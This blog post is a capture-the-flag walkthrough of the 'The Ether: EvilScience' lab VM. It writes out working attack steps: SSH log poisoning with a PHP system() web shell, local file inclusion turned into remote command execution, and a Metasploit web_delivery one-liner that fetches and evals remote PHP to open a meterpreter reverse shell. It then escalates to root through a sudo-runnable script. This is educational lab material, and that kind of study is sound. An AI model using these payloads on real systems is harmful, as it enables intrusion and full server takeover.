Amonsec

It's all about digital security.

A simple blog where you can find different things about digital security.

The Ether: CTF walkthrough

Introduction

Name: The Ether: EvilScience
Date release: 26 Oct 2017

Authorf1re_w1re
SeriesThe Ether
Web pagehttps://securityshards.wordpress.com/2017/10/26/the-ether-a-new-boot-2-root-hacking-challenge/

Note, the VM from Vulnhub have an issue. You have to download the VM from this updated link (from the author website): here

 

Recognition

We use arp-scan to find the IP address of the VM.

the_ether_ctf_walkthrough_arp_scan.png

Then, we scans the VM to find open ports and running services.

root@kali:~# nmap -A -F 192.168.1.54

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-26 13:04 CET
Nmap scan report for theether-1.home (192.168.1.54)
Host is up (0.00074s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 00:0C:29:44:E7:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms theether-1.home (192.168.1.54)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds
root@kali:~#
 

Remote commands execution

After few scan and some research with the OWASP-Zap tool I found that we are able to read the content of the auth.log file where are stored SSH connections information.

the_ether_ctf_walkthrough_owasp_zap_lfi.png

We can poisoned this log file with this following connection attempt.

root@kali:~# ssh '<?php echo system($_GET['c']);?>'@192.168.1.54
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@192.168.1.54's password: 
<?php echo system($_GET[c]);?>@192.168.1.54: Permission denied (publickey,password).
root@kali:~#

Then, to check if we have an RCE we can execute this query.

root@kali:~# curl 'http://192.168.1.54/index.php?file=/var/log/auth.log&c=ls' -s | head

Nov 26 05:04:53 theEther sshd[2024]: Invalid user about.php
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py
xxxlogauditorxxx.py from 192.168.1.104
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user about.php
(23) Failed writing body
root@kali:~#
 

From RCE to reverse shell

For this CTF I will use the web_delivery exploit from the Metasploit Framework.

root@kali:~# msfconsole -q -x 'use exploit/multi/script/web_delivery'
msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf exploit(web_delivery) >

I changed the SRVPORT (default 8080 is used by OWASP-Zap), the PAYLOAD (PHP instead of Python), the LHOST and the TARGET (for a PHP payload) parameters.

msf exploit(web_delivery) > set TARGET 1
TARGET => 1
msf exploit(web_delivery) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf exploit(web_delivery) > set SRVPORT 9090
SRVPORT => 9090
msf exploit(web_delivery) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.104:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:9090/DBoQOU8UZc3Qfb
[*] Local IP: http://192.168.1.104:9090/DBoQOU8UZc3Qfb
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.104:9090/DBoQOU8UZc3Qfb'));"

msf exploit(web_delivery) >

Finally, we execute the PHP command to gain a reverse shell.

root@kali:~# python 
Python 2.7.14 (default, Sep 17 2017, 18:50:44) 
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> url = '''http://192.168.1.54/index.php?file=/var/log/auth.log&c=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.104:9090/DBoQOU8UZc3Qfb'));"'''
>>> resp = requests.get(url)

Let’s get a TTY with low privilege.

the_ether_ctf_walkthrough_low_privieledge_shell.png
 

Privilege escalation

A weird python script can be found in the /var/www/html/theEther.com/public_html directory.

bash-4.3$ ls -la
ls -la
total 11312
drwxrwxr-x 4 root www-data        4096 Nov 23 19:44 .
drwxr-xr-x 5 root root            4096 Oct 23 18:31 ..
-rwxrwxr-x 1 root www-data        5891 Oct 23 19:27 about.php
drwxrwxr-x 3 root www-data        4096 Oct 23 18:02 images
-rwxrwxr-x 1 root www-data        6495 Oct 23 20:48 index.php
drwxrwxr-x 4 root www-data        4096 Oct 23 18:02 layout
-rwxrwxr-x 1 root www-data        5006 Oct 23 18:02 licence.txt
-rwxrwxr-x 1 root www-data       10641 Oct 23 19:26 research.php
-rwsrwsr-x 1 root evilscience 11527272 Nov 23 19:41 xxxlogauditorxxx.py
bash-4.3$

Moreover, we can execute this script with root privilege without password.

the_ether_ctf_walkthrough_sudo_vulnerability.png

Plus, this script execute the cat command, so we are able to run any commands we want with root privilege.

the_ether_ctf_walkthrough_exploit_poc.png

We upload and we execute a reverse shell on the system.

the_ether_ctf_walkthrough_root_shell.png

We read the flag hidden in a PNG file.

the_ether_ctf_walkthrough_the_flag.png

Finally, we decode the base64 flag.

the_ether_ctf_walkthrough_decoded_flag.png
 
 

break